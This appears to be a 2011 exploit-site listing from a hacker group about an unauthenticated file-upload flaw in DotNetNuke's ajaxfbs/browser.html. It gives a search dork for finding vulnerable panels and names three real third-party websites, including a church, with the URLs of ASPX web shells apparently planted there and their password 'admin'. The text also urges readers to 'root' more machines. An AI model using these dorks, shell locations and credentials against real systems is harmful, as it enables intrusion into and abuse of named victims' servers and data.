[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DotNetNuke Multiple 0day Vulnerabilities

Author
SeeMe
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16462
Category
web applications
Date add
04-07-2011
Platform
php
==========================================
              DotNetNuke Multiple 0day Vulnerabilities
==========================================


             The largest Exploit Database in the world !
 
# Greetz to Inj3ct0r Cr3w 1337day.com
# Greetz to R0073r "Sid3^effects - Were ya @ Bro" indoushka XroGuE gunslinger_ KedAns-Dz L0rd CrusAd3r "The Exploited - I miss you buddy!"
#
#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0     _                   __           __       __                     1
#1   /' \            __  /'__`\        /\ \__  /'__`\                   0
#0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
#1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
#0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
#1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
#0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
#1                  \ \____/ >> Exploit database separated by exploit   0
#0                   \/___/          type (local, remote, DoS, etc.)    1
#1                                                                      1
#0  [+] Site            : Inj3ct0r.com                                  0
#1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
#0                                                                      0
#1                    ####################################              1
#0                    I'm SeeMe  member from Inj3ct0r Team              1
#1                    ####################################              0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

DotNetNuke 5.x other versions may be effected as well,

[+] Application: DotNetNuke
[+] Affected Version: version prior to 5.x
[+] Vendor’s URL: http://www.dotnetnuke.com/
[+] Bug Type: Privilege escalation, Unauthorized access, Remote
[+] Risk Level: High



[+] No-exploit is required to make it easier than what it is..
[+] DotNetNuke Remote File Upload Vulnerability
[+] Add/User Account Security Failer Vulnerability
[+] Unauthorized Full access to the Server! :)
[+] Unauthorized Full access to the Files and Database!
[+] It Could Be Failure to revalidate file and folder permissions correctly for uploads.

[-*-] Quick Note:

 [-] Vulnerability Details: DO NOT be a zone h lamer! just try to be more effective speard your shit
     And hunte more idiots and root their machines! then hit them in the middle of no where by Saying
               "Ph33r"

Access the upload panel Just dork:"inurl:ajaxfbs/browser.html"

Demo:

[1] http://www.iebsoftware.com/tramways/DesktopModules/FeedbackDesigner/ajaxfbs/browser.html
    Aspx Shell with New user Privilege
    http://www.iebsoftware.com/aspx.aspx
    Password: admin

[2] http://churchofthegoodshepherdwantage.org/DesktopModules/FlashSlide/ajaxfbs/browser.html
    Aspx Shell with New user Privilege
    http://churchofthegoodshepherdwantage.org/aspx.aspx
    Password: admin

[3] http://members2.allegranetwork.com/DeskTopModules/Complete%20Feedback%20Designer/ajaxfbs/browser.html
    Aspx Shell with New user Privilege
    http://members2.allegranetwork.com/aspx.aspx
    Password: admin




[*_*] The thanx belongs to the masters! Islamic Ghosts Team :)



#  0day.today [2024-12-25]  #